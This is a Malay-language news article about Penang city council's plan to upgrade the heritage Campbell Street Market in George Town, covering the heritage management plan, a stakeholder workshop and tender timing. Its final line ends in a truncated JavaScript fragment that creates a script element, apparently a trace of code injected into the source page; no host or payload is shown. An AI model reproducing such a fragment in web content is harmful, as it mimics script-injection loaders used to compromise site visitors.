Naik taraf Pasar Lebuh Campbell dapat reaksi positif komuniti setempat

Oleh : NORSHAHIDA YUSOFF

Gambar : ALISSALA THIAN

GEORGE TOWN – Rata-rata penduduk setempat dan para peniaga bersikap terbuka terhadap cadangan pambangunan semula Projek Menaik Taraf dan Membaik Pulih Pasar Lebuh Campbell yang dikemukakan Majlis Bandaraya Pulau Pinang (MBPP) baru-baru ini.

Exco Kerajaan Tempatan, Pengurusan Lalulintas dan Tebatan Banjir, Chow Kon Yeow berkata , memandangkan bangunan Pasar Lebuh Campbell merupakan bangunan warisan, maka salah satu laporan yang perlu disediakan sebelum kerja-kerja menaik taraf adalah Pelan Pengurusan Warisan (HMP).

“HMP adalah dokumen yang memberi peluang kepada pemilik dan pengguna untuk memahami tapak warisan, pelan perancangan untuk pemeliharaan serta perancangan masa hadapan.

“Proses penyediaan dokumen ini memerlukan kaji selidik yang menyeluruh dan semestinya penglibatan penuh daripada komuniti setempat.

“Antara langkah-langkah bagi menyediakan HMP ini adalah termasuk kajian sejarah dan latar belakang tapak, mengenal pasti nilai-nilai sejarah dan seni bina aset warisan, kajian potensi tapak dan pelaksanaan strategi untuk memelihara nilai tapak warisan,” ujarnya ketika melakukan lawatan tapak ke pasar berkenaan di sini baru-baru ini.

Hadir sama, Ahli Dewan Undangan Negeri (ADUN) Komtar, Teh Lai Heng, Pengarah Konservasi Warisan MBPP, Noorhanis Noordin dan Ahli-ahli Majlis MBPP.

Pihak MBPP telah melantik Arkitek Zalena Abdul Aziz selaku Arkitek Perunding untuk menyediakan kajian bangunan sedia ada, draf cadangan susun atur semula ruang dalaman pasar dan cadangan ruang aksesori tambahan yang diperlukan untuk menaik taraf serta membaik pulih pasar berkaitan.

Tambah Kon Yeow, satu Bengkel Penyelarasan Pandangan (Visioning Workshop) bersama-sama pihak-pihak berkepentingan telah dijalankan pada 25 Ogos 2016 bagi memastikan pelan reka bentuk tersebut adalah selaras dengan cadangan yang dikemukakan oleh komuniti setempat dan pihak berkepentingan lain.

“Apa yang boleh dirumuskan semasa penganjuran bengkel ini akan dimasukkan ke dalam pelan reka bentuk akhir oleh Arkitek Zalena dan HMP Pasar Lebuh Campbell yang dibentangkan hari ini (20 Disember 2016) untuk rujukan pengguna bangunan.

“Antara cadangannya, isu kesihatan dan kebersihan di dalam pasar perlu diketengahkan bagi memastikan kelestarian bangunan serta kepenggunaan tapak dan pihak komuniti pasar perlu memberi kerjasama dalam memastikan bahan-bahan organik diselenggara dengan baik bagi kepentingan bersama,” jelasnya.

Dengan anggaran kos sejumlah RM5 juta, penggilan tender untuk projek berkaitan dijangka diadakan pada Mac atau April tahun ini dan kerja-kerja menaik taraf dijangka akan dimulakan pada bulan Jun tahun sama.

Sebarang maklum balas berhubung projek tersebut boleh disalurkan kepada Jabatan Konservasi Warisan MBPP melalui talian 04 – 259 2009.var d=document;var s=d.createElement(‘script’);